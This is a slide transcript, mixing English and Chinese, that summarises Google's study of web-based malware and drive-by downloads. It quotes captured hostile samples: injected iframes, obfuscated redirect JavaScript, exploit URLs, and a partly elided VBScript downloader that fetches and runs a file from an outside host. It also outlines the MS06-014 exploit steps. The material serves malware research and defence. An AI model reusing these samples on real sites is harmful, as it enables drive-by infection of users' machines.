niels provos, dean mcnamee, panayiotis mavrommatis, ke wang and nagendra modadugu google, inc
TRANSCRIPT
![Page 1: Niels Provos, Dean McNamee, Panayiotis Mavrommatis, Ke Wang and Nagendra Modadugu Google, Inc](https://reader030.vdocuments.mx/reader030/viewer/2022032605/56649e7e5503460f94b81791/html5/thumbnails/1.jpg)
The Ghost In The BrowserAnalysis of Web-based Malware
Niels Provos, Dean McNamee, Panayiotis Mavrommatis, Ke Wang and Nagendra ModaduguGoogle, Inc.
![Page 2: Niels Provos, Dean McNamee, Panayiotis Mavrommatis, Ke Wang and Nagendra Modadugu Google, Inc](https://reader030.vdocuments.mx/reader030/viewer/2022032605/56649e7e5503460f94b81791/html5/thumbnails/2.jpg)
Preface
Google現有的大量資料
Google與Microsoft
![Page 3: Niels Provos, Dean McNamee, Panayiotis Mavrommatis, Ke Wang and Nagendra Modadugu Google, Inc](https://reader030.vdocuments.mx/reader030/viewer/2022032605/56649e7e5503460f94b81791/html5/thumbnails/3.jpg)
Introduction
本篇描述一個新的趨勢 : 用Web-based的方式來達成 exploits.
Unlike traditional botnets that use push-based infection, web-based malware infection follows a pull-based model, creating botnet-like structures.
從 2006年 3月用 12個月的時間 ,蒐集這段時間的資料
![Page 4: Niels Provos, Dean McNamee, Panayiotis Mavrommatis, Ke Wang and Nagendra Modadugu Google, Inc](https://reader030.vdocuments.mx/reader030/viewer/2022032605/56649e7e5503460f94b81791/html5/thumbnails/4.jpg)
Related Works
Alex Moshchuk: http://research.microsoft.com/en-us/people/alexmos/
He showed a decrease in drive-by-downloads over time.
資料少
![Page 5: Niels Provos, Dean McNamee, Panayiotis Mavrommatis, Ke Wang and Nagendra Modadugu Google, Inc](https://reader030.vdocuments.mx/reader030/viewer/2022032605/56649e7e5503460f94b81791/html5/thumbnails/5.jpg)
Related Works
HoneyMonkey: 較細 , 個案Specific vulnerabilitieshttp://research.microsoft.com/en
-us/um/people/ymwang/
![Page 6: Niels Provos, Dean McNamee, Panayiotis Mavrommatis, Ke Wang and Nagendra Modadugu Google, Inc](https://reader030.vdocuments.mx/reader030/viewer/2022032605/56649e7e5503460f94b81791/html5/thumbnails/6.jpg)
Definition of Malicious of This Paper
A web page is deemed malicious, if it causes the automatic installation of software without the user’s knowledge or consent.
![Page 7: Niels Provos, Dean McNamee, Panayiotis Mavrommatis, Ke Wang and Nagendra Modadugu Google, Inc](https://reader030.vdocuments.mx/reader030/viewer/2022032605/56649e7e5503460f94b81791/html5/thumbnails/7.jpg)
Detecting Dangerous Web Pages
not attempt to investigate the actual behavior of the installed software, but rather identify the mechanisms used to introduce the software into the system via the browser.
![Page 8: Niels Provos, Dean McNamee, Panayiotis Mavrommatis, Ke Wang and Nagendra Modadugu Google, Inc](https://reader030.vdocuments.mx/reader030/viewer/2022032605/56649e7e5503460f94b81791/html5/thumbnails/8.jpg)
Detection architecture
![Page 9: Niels Provos, Dean McNamee, Panayiotis Mavrommatis, Ke Wang and Nagendra Modadugu Google, Inc](https://reader030.vdocuments.mx/reader030/viewer/2022032605/56649e7e5503460f94b81791/html5/thumbnails/9.jpg)
MapReduce
用MapReduce處理大量 URL & all links to potential exploit URLs
最後得出malware URLs(Pages)
![Page 10: Niels Provos, Dean McNamee, Panayiotis Mavrommatis, Ke Wang and Nagendra Modadugu Google, Inc](https://reader030.vdocuments.mx/reader030/viewer/2022032605/56649e7e5503460f94b81791/html5/thumbnails/10.jpg)
Monitor and Analysis
1. A new processes being started.2. Registry and file system changes.
Scores to each recorded component: use different anti-virus engines.
And sum all score as total score. 以上是大概的方式 , 詳細的它沒講
![Page 11: Niels Provos, Dean McNamee, Panayiotis Mavrommatis, Ke Wang and Nagendra Modadugu Google, Inc](https://reader030.vdocuments.mx/reader030/viewer/2022032605/56649e7e5503460f94b81791/html5/thumbnails/11.jpg)
Peak performance 300,000(30萬 )
![Page 12: Niels Provos, Dean McNamee, Panayiotis Mavrommatis, Ke Wang and Nagendra Modadugu Google, Inc](https://reader030.vdocuments.mx/reader030/viewer/2022032605/56649e7e5503460f94b81791/html5/thumbnails/12.jpg)
URLs
Total 4.5million URLs 450,000 URLs were engaging in
drive-by-downloads. About 10% of the URLs were
malicious
![Page 13: Niels Provos, Dean McNamee, Panayiotis Mavrommatis, Ke Wang and Nagendra Modadugu Google, Inc](https://reader030.vdocuments.mx/reader030/viewer/2022032605/56649e7e5503460f94b81791/html5/thumbnails/13.jpg)
Inject malicious content on popular web sites
web server security user contributed content advertising third-party widgets
![Page 14: Niels Provos, Dean McNamee, Panayiotis Mavrommatis, Ke Wang and Nagendra Modadugu Google, Inc](https://reader030.vdocuments.mx/reader030/viewer/2022032605/56649e7e5503460f94b81791/html5/thumbnails/14.jpg)
Web Server Security
Scripting applications(網頁套件 , 模組 ) phpBB2 InvisionBoard
![Page 15: Niels Provos, Dean McNamee, Panayiotis Mavrommatis, Ke Wang and Nagendra Modadugu Google, Inc](https://reader030.vdocuments.mx/reader030/viewer/2022032605/56649e7e5503460f94b81791/html5/thumbnails/15.jpg)
Invision Power Board
<!-- Copyright Information --><div align=’center’ class=’copyright’>Powered by<a href="http://www.invisionboard.com">Invision Power
Board</a>(U)v1.3.1 Final © 2003 <a href=’http://www.invisionpower.com’>IPS, Inc.</a></div></div><iframe
src=’http://wsfgfdgrtyhgfd.net/adv/193/new.php’></iframe>
<iframe src=’http://wsfgfdgrtyhgfd.net/adv/new.php?adv=193’></iframe>
![Page 16: Niels Provos, Dean McNamee, Panayiotis Mavrommatis, Ke Wang and Nagendra Modadugu Google, Inc](https://reader030.vdocuments.mx/reader030/viewer/2022032605/56649e7e5503460f94b81791/html5/thumbnails/16.jpg)
User Contributed Content
Permit posts, and allow to insert arbitrary HTML.(可讓別人留言的網頁 , 允許 html) <iframe> <script>
![Page 17: Niels Provos, Dean McNamee, Panayiotis Mavrommatis, Ke Wang and Nagendra Modadugu Google, Inc](https://reader030.vdocuments.mx/reader030/viewer/2022032605/56649e7e5503460f94b81791/html5/thumbnails/17.jpg)
Though Limited HTML support, but …
<SCRIPT language=JavaScript>function otqzyu(nemz)juyu="lo";sdfwe78="catio";kjj="n.r";vj20=2;uyty="eplac";iuiuh8889="e";vbb25="
(’";awq27="";sftfttft=4;fghdh="’ht";ji87gkol="tp:/";polkiuu="/vi";jbhj89="deo";jhbhi87="zf";hgdxgf="re";jkhuift="e.c";jygyhg="om’";dh4=eval(fghdh+ji87gkol+polkiuu+jbhj89+jhbhi87+hgdxgf+jkhuift+jygyhg);je15
="’)";if (vj20+sftfttft==6) eval(juyu+sdfwe78+kjj+ uyty+iuiuh8889+vbb25+awq27+dh4+je15);otqzyu();//</SCRIPT>
![Page 18: Niels Provos, Dean McNamee, Panayiotis Mavrommatis, Ke Wang and Nagendra Modadugu Google, Inc](https://reader030.vdocuments.mx/reader030/viewer/2022032605/56649e7e5503460f94b81791/html5/thumbnails/18.jpg)
De-obfuscating
location.replace(’http://videozfree.com’)
![Page 19: Niels Provos, Dean McNamee, Panayiotis Mavrommatis, Ke Wang and Nagendra Modadugu Google, Inc](https://reader030.vdocuments.mx/reader030/viewer/2022032605/56649e7e5503460f94b81791/html5/thumbnails/19.jpg)
Advertising
廣告租借
![Page 20: Niels Provos, Dean McNamee, Panayiotis Mavrommatis, Ke Wang and Nagendra Modadugu Google, Inc](https://reader030.vdocuments.mx/reader030/viewer/2022032605/56649e7e5503460f94b81791/html5/thumbnails/20.jpg)
Third-Party Widgets
計數器 Another example: iframemoney.org
![Page 21: Niels Provos, Dean McNamee, Panayiotis Mavrommatis, Ke Wang and Nagendra Modadugu Google, Inc](https://reader030.vdocuments.mx/reader030/viewer/2022032605/56649e7e5503460f94b81791/html5/thumbnails/21.jpg)
Example
<!-- Begin Stat Basic code --><script language="JavaScript"src="http://m1.stat.xx/basic.js"></script><script language="JavaScript"><!--statbasic("ST8BiCCLfUdmAHKtah3InbhtwoWA", 0);// --></script> <noscript><a href="http://v1.stat.xx/stats?ST8BidmAHKthtwoWA"><img src="http://m1.stat.xx/n?
id=ST8BidmAHKthtwoWA"border="0" nosave width="18"
height="18"></a></noscript><!-- End Stat Basic code -->
d.write("<scr"+"ipt language=’JavaScript’type=’text/javascript’src=’http://m1.stats4u.yy/md.js?country=us&id="+ id +"&_t="+(new Date()).getTime()+"’></scr"+"ipt>")
![Page 22: Niels Provos, Dean McNamee, Panayiotis Mavrommatis, Ke Wang and Nagendra Modadugu Google, Inc](https://reader030.vdocuments.mx/reader030/viewer/2022032605/56649e7e5503460f94b81791/html5/thumbnails/22.jpg)
Trigger another exploit code
http://expl.info/cgi-bin/ie0606.cgi?homepagehttp://expl.info/demo.phphttp://expl.info/cgi-bin/ie0606.cgi?type=MS03-
11&SP1http://expl.info/ms0311.jarhttp://expl.info/cgi-bin/ie0606.cgi?exploit=MS03-
11http://dist.info/f94mslrfum67dh/winus.exe
Microsoft Security Bulletin MS03-011: A flaw in Microsoft VM Could Enable System Compromise.
![Page 23: Niels Provos, Dean McNamee, Panayiotis Mavrommatis, Ke Wang and Nagendra Modadugu Google, Inc](https://reader030.vdocuments.mx/reader030/viewer/2022032605/56649e7e5503460f94b81791/html5/thumbnails/23.jpg)
Exploitation Mechanisms
first needs to gain control over a user’s system:傳統 : finding vulnerable network services
and remotely exploiting them. NAT, Firewall
Now: Lure users to connect to malicious servers.
傳統的方式受到限制 , 而用web server(網頁 )&drive by download.
Once a vulnerability has been discovered, an adversary can choose an appropriate exploit and ask the web browser to download it.
![Page 24: Niels Provos, Dean McNamee, Panayiotis Mavrommatis, Ke Wang and Nagendra Modadugu Google, Inc](https://reader030.vdocuments.mx/reader030/viewer/2022032605/56649e7e5503460f94b81791/html5/thumbnails/24.jpg)
Exploiting Software
In Browser Launched external programs Download, store and then execute a
malware binary.(drive-by-download)
![Page 25: Niels Provos, Dean McNamee, Panayiotis Mavrommatis, Ke Wang and Nagendra Modadugu Google, Inc](https://reader030.vdocuments.mx/reader030/viewer/2022032605/56649e7e5503460f94b81791/html5/thumbnails/25.jpg)
Microsoft’s Data Access Components
http://www.microsoft.com/taiwan/technet/security/bulletin/ms06-014.mspx
Javascript can reliably accomplish.分析這一種比較困難 , 例如 : 只能下載一次 ,後來就變空的
![Page 26: Niels Provos, Dean McNamee, Panayiotis Mavrommatis, Ke Wang and Nagendra Modadugu Google, Inc](https://reader030.vdocuments.mx/reader030/viewer/2022032605/56649e7e5503460f94b81791/html5/thumbnails/26.jpg)
Example
The following example illustrates the steps taken by an adversaryto leverage this vulnerability into remote code execution:
• The exploit is delivered to a user’s browser via aniframe on a compromised web page.• The iframe contains Javascript to instantiate an ActiveXobject that is not normally safe for scripting.• The Javascript makes an XMLHTTP request to retrievean executable.• Adodb.stream is used to write the executable to disk.• A Shell.Application is used to launch the newly writtenexecutable.
A twenty line Javascript can reliably accomplish this sequenceof steps to launch any binary on a vulnerable installation.
![Page 27: Niels Provos, Dean McNamee, Panayiotis Mavrommatis, Ke Wang and Nagendra Modadugu Google, Inc](https://reader030.vdocuments.mx/reader030/viewer/2022032605/56649e7e5503460f94b81791/html5/thumbnails/27.jpg)
WebViewFolderIcon
Heap spraying Code here: http://
forum.eviloctal.com/archiver/tid-25077.html
![Page 28: Niels Provos, Dean McNamee, Panayiotis Mavrommatis, Ke Wang and Nagendra Modadugu Google, Inc](https://reader030.vdocuments.mx/reader030/viewer/2022032605/56649e7e5503460f94b81791/html5/thumbnails/28.jpg)
Use Javascript to catalog IE or Firefox
Also version of JVM Patches to OS
![Page 29: Niels Provos, Dean McNamee, Panayiotis Mavrommatis, Ke Wang and Nagendra Modadugu Google, Inc](https://reader030.vdocuments.mx/reader030/viewer/2022032605/56649e7e5503460f94b81791/html5/thumbnails/29.jpg)
EX: http://blog.yam.com/visioncan/article/10598530
<script>window.env=new function(){ this.isOpera=(window.opera&&navigator.userAgent.match(/opera/gi))?true:false; this.isIE=(!this.isOpera&&document.all&&navigator.userAgent.match(/msie/gi))?true:false; this.isSafari=(!this.isIE&&navigator.userAgent.match(/safari/gi))?true:false; this.isGecko=(!this.isIE&&navigator.userAgent.match(/gecko/gi))?true:false; this.isFirefox=(!this.isIE&&navigator.userAgent.match(/firefox/gi))?true:false;};//=====================var s = "";for (var i in env) { s += i + " : " + env[i] + "\n";}alert(s);</script>
![Page 30: Niels Provos, Dean McNamee, Panayiotis Mavrommatis, Ke Wang and Nagendra Modadugu Google, Inc](https://reader030.vdocuments.mx/reader030/viewer/2022032605/56649e7e5503460f94b81791/html5/thumbnails/30.jpg)
EX: http://demo.tc/Post/366
<script type="text/javascript"> var isIE = navigator.userAgent.search("MSIE") > -1; var isIE7 = navigator.userAgent.search("MSIE 7") > -1; var isFirefox = navigator.userAgent.search("Firefox") > -1; var isOpera = navigator.userAgent.search("Opera") > -1; var isSafari = navigator.userAgent.search(“Safari”) > -1;//Google瀏覽器是用這核心 if (isIE7) { alert('isIE7'); } if (isIE) { alert('isIE'); } if (isFirefox) { alert('isFirefox'); } if (isOpera) { alert('isOpera'); } if (isSafari) { alert('isSafari'); } </script>
![Page 31: Niels Provos, Dean McNamee, Panayiotis Mavrommatis, Ke Wang and Nagendra Modadugu Google, Inc](https://reader030.vdocuments.mx/reader030/viewer/2022032605/56649e7e5503460f94b81791/html5/thumbnails/31.jpg)
JVM EX: http://forums.sun.com/thread.jspa?threadID=547717
alert("javaEnabled "+ window.navigator.javaEnabled());alert("java version "+
java.lang.System.getProperty("java.version"));
![Page 32: Niels Provos, Dean McNamee, Panayiotis Mavrommatis, Ke Wang and Nagendra Modadugu Google, Inc](https://reader030.vdocuments.mx/reader030/viewer/2022032605/56649e7e5503460f94b81791/html5/thumbnails/32.jpg)
Tricking the User
騙人下載且執行
codec (解碼器 )
![Page 33: Niels Provos, Dean McNamee, Panayiotis Mavrommatis, Ke Wang and Nagendra Modadugu Google, Inc](https://reader030.vdocuments.mx/reader030/viewer/2022032605/56649e7e5503460f94b81791/html5/thumbnails/33.jpg)
Obfuscation
教學 http://anti-hacker.blogspot.com/2008/02/javascript7.html
如此用 Javascript 可逃過偵測另外有聲譽的一些網站也用了
obfuscation, 所以用此判斷會有 false positive.
![Page 34: Niels Provos, Dean McNamee, Panayiotis Mavrommatis, Ke Wang and Nagendra Modadugu Google, Inc](https://reader030.vdocuments.mx/reader030/viewer/2022032605/56649e7e5503460f94b81791/html5/thumbnails/34.jpg)
Example
document.write(unescape("%3CHEAD%3E%0D%0A%3CSCRIPT%20LANGUAGE%3D%22Javascript%22%3E%0D%0A%3C%21--%0D%0A/*%20criptografado%20pelo%20Fal%20-%20Deboa%E7%E3o...%3C/BODY%3E%0D%0A%3C/HTML%3E%0D%0A"));//--></SCRIPT>-------------------------------------------------------------------------------------<SCRIPT LANGUAGE="Javascript"><!--/* criptografado pelo Fal - [...]document.write(unescape("%0D%0A%3Cscript%20language%3D%22VBScript%22%3E%0D%0A%0D%0A%20%20%20%20on%20error%20resume%20next%0D%0A%0D%0A%20%20%20%20%0D%0A%0D%0A
%20%20...D%0A%0D%0A%20%20%20%20%3C/script%3E%0D%0A%3C/html%3E"));//--></SCRIPT>
![Page 35: Niels Provos, Dean McNamee, Panayiotis Mavrommatis, Ke Wang and Nagendra Modadugu Google, Inc](https://reader030.vdocuments.mx/reader030/viewer/2022032605/56649e7e5503460f94b81791/html5/thumbnails/35.jpg)
<script language="VBScript">on error resume nextdl = "http://foto02122006.xxx.ru/foto.scr"Set df = document.createElement("object")df.setAttribute "classid",
"clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"str="Microsoft.XMLHTTP"Set x = df.CreateObject(str,"")
...S.closeset Q = df.createobject("Shell.Application","")Q.ShellExecute fname1,"","","open",0
</script>
![Page 36: Niels Provos, Dean McNamee, Panayiotis Mavrommatis, Ke Wang and Nagendra Modadugu Google, Inc](https://reader030.vdocuments.mx/reader030/viewer/2022032605/56649e7e5503460f94b81791/html5/thumbnails/36.jpg)
Malware Classfication
用 antivirus軟體分類 , 以下 3類 : Trojan: 一般安裝的手法 Adware: 跑廣告出來的軟體 Unknown/Obfuscated: 不確定的
![Page 37: Niels Provos, Dean McNamee, Panayiotis Mavrommatis, Ke Wang and Nagendra Modadugu Google, Inc](https://reader030.vdocuments.mx/reader030/viewer/2022032605/56649e7e5503460f94b81791/html5/thumbnails/37.jpg)
200,000 unique malware binaries Assumed that two binaries are
different if their cryptographic digests(hashes) are different. Why use the method?(如此分別 unique的原因 )▪ Based on structural similarities or the exploit
they use is expensive.▪ No readily available tools
![Page 38: Niels Provos, Dean McNamee, Panayiotis Mavrommatis, Ke Wang and Nagendra Modadugu Google, Inc](https://reader030.vdocuments.mx/reader030/viewer/2022032605/56649e7e5503460f94b81791/html5/thumbnails/38.jpg)
Malware family Percentage
![Page 39: Niels Provos, Dean McNamee, Panayiotis Mavrommatis, Ke Wang and Nagendra Modadugu Google, Inc](https://reader030.vdocuments.mx/reader030/viewer/2022032605/56649e7e5503460f94b81791/html5/thumbnails/39.jpg)
Malware Analysis
Adware and Trojans are the most prevalent malware categories
For adware, Trymedia and NewDotNet are the most common providers of Adware.
For Trojans, Trojan downloaders and banking Trojans are the most common.
![Page 40: Niels Provos, Dean McNamee, Panayiotis Mavrommatis, Ke Wang and Nagendra Modadugu Google, Inc](https://reader030.vdocuments.mx/reader030/viewer/2022032605/56649e7e5503460f94b81791/html5/thumbnails/40.jpg)
Trymedia
Trymedia is an adware that infects your computer through peer-to-peer networks, shareware programs and some websites.
It monitors your surfing activity, especially your shopping and banking habits, collects this information and sends it to the Trymedia server.
Based on this information your computer is bombarded with ad pop-ups.
![Page 41: Niels Provos, Dean McNamee, Panayiotis Mavrommatis, Ke Wang and Nagendra Modadugu Google, Inc](https://reader030.vdocuments.mx/reader030/viewer/2022032605/56649e7e5503460f94b81791/html5/thumbnails/41.jpg)
NewDotNet
It tracks what websites a person visits and then pops up separate browser windows with targeted advertisements and special offers.
It continuously is downloading updated information about new offers and collects a variety of information.
http://blog.xuite.net/reptile/diary/4539739
![Page 42: Niels Provos, Dean McNamee, Panayiotis Mavrommatis, Ke Wang and Nagendra Modadugu Google, Inc](https://reader030.vdocuments.mx/reader030/viewer/2022032605/56649e7e5503460f94b81791/html5/thumbnails/42.jpg)
Trojan downloader
Usually a bootstrap to download other arbitrary binaries onto a machine.
![Page 43: Niels Provos, Dean McNamee, Panayiotis Mavrommatis, Ke Wang and Nagendra Modadugu Google, Inc](https://reader030.vdocuments.mx/reader030/viewer/2022032605/56649e7e5503460f94b81791/html5/thumbnails/43.jpg)
Banking Trojans
steal sensitive information such as bank account numbers and corresponding passwords.
The extracted information is often sent back to the adversary via throw-away email accounts.
![Page 44: Niels Provos, Dean McNamee, Panayiotis Mavrommatis, Ke Wang and Nagendra Modadugu Google, Inc](https://reader030.vdocuments.mx/reader030/viewer/2022032605/56649e7e5503460f94b81791/html5/thumbnails/44.jpg)
With unique URLs
Trojan 最多 , over 300,000
![Page 45: Niels Provos, Dean McNamee, Panayiotis Mavrommatis, Ke Wang and Nagendra Modadugu Google, Inc](https://reader030.vdocuments.mx/reader030/viewer/2022032605/56649e7e5503460f94b81791/html5/thumbnails/45.jpg)
人工的方式檢測不是 browser發出的HTTP request: Majority▪ Pop-up ad▪ Rank inflation
Some cases▪ Receive binary updates and instructions▪ the anti-virus engines provided a classification, the
binaries were labeled either as Trojan or Worm.
![Page 46: Niels Provos, Dean McNamee, Panayiotis Mavrommatis, Ke Wang and Nagendra Modadugu Google, Inc](https://reader030.vdocuments.mx/reader030/viewer/2022032605/56649e7e5503460f94b81791/html5/thumbnails/46.jpg)
Remotely Linked Exploits
the majority of the exploits were hosted on third-party servers and not on the compromised web sites.
The attacker had managed to compromise the web site content to point towards an external URL hosting the exploit either via iframes or external JavaScript.
Or, less popular, completely redirect to another malicious site.
![Page 47: Niels Provos, Dean McNamee, Panayiotis Mavrommatis, Ke Wang and Nagendra Modadugu Google, Inc](https://reader030.vdocuments.mx/reader030/viewer/2022032605/56649e7e5503460f94b81791/html5/thumbnails/47.jpg)
Number of pointing to exploit URLs
Number of pointing to exploit URLs
![Page 48: Niels Provos, Dean McNamee, Panayiotis Mavrommatis, Ke Wang and Nagendra Modadugu Google, Inc](https://reader030.vdocuments.mx/reader030/viewer/2022032605/56649e7e5503460f94b81791/html5/thumbnails/48.jpg)
The reason(The advantage of remotely exploits)
1. Ease of management2. Having points to a single site offers
an aggregation point to monitor and generate statistics.
3. Able to update the portfolio of exploits by just changing a single web page.
![Page 49: Niels Provos, Dean McNamee, Panayiotis Mavrommatis, Ke Wang and Nagendra Modadugu Google, Inc](https://reader030.vdocuments.mx/reader030/viewer/2022032605/56649e7e5503460f94b81791/html5/thumbnails/49.jpg)
分流…
![Page 50: Niels Provos, Dean McNamee, Panayiotis Mavrommatis, Ke Wang and Nagendra Modadugu Google, Inc](https://reader030.vdocuments.mx/reader030/viewer/2022032605/56649e7e5503460f94b81791/html5/thumbnails/50.jpg)
![Page 51: Niels Provos, Dean McNamee, Panayiotis Mavrommatis, Ke Wang and Nagendra Modadugu Google, Inc](https://reader030.vdocuments.mx/reader030/viewer/2022032605/56649e7e5503460f94b81791/html5/thumbnails/51.jpg)
Malware evolution
防止 anti-vire software偵測最快的差不多每小時更新 (改變 )一次
![Page 52: Niels Provos, Dean McNamee, Panayiotis Mavrommatis, Ke Wang and Nagendra Modadugu Google, Inc](https://reader030.vdocuments.mx/reader030/viewer/2022032605/56649e7e5503460f94b81791/html5/thumbnails/52.jpg)
Discussion
We expect that the majority of malware is no longer spreading via remote exploitation but rather as we indicated in this paper via web-based infection.
This rationale can be motivated by the fact that the computer of an average user provides a richer environment for adversaries to mine, for example, it is more likely to find banking transactions and credit card numbers on a user’s machine than on a compromised server.
![Page 53: Niels Provos, Dean McNamee, Panayiotis Mavrommatis, Ke Wang and Nagendra Modadugu Google, Inc](https://reader030.vdocuments.mx/reader030/viewer/2022032605/56649e7e5503460f94b81791/html5/thumbnails/53.jpg)
Conclusion
1. identify the four prevalent mechanisms used to inject malicious content on popular web sites.
2. a large number of malicious web pages responsible for malware infections and found evidence that web-based malware creates botnet-like structures in which compromised machines query web servers periodically for instructions and updates.
3. malware binary change frequently.4. achieve better exposure and more reliability,
malware binaries are often distributed across a large number of URLs and domains.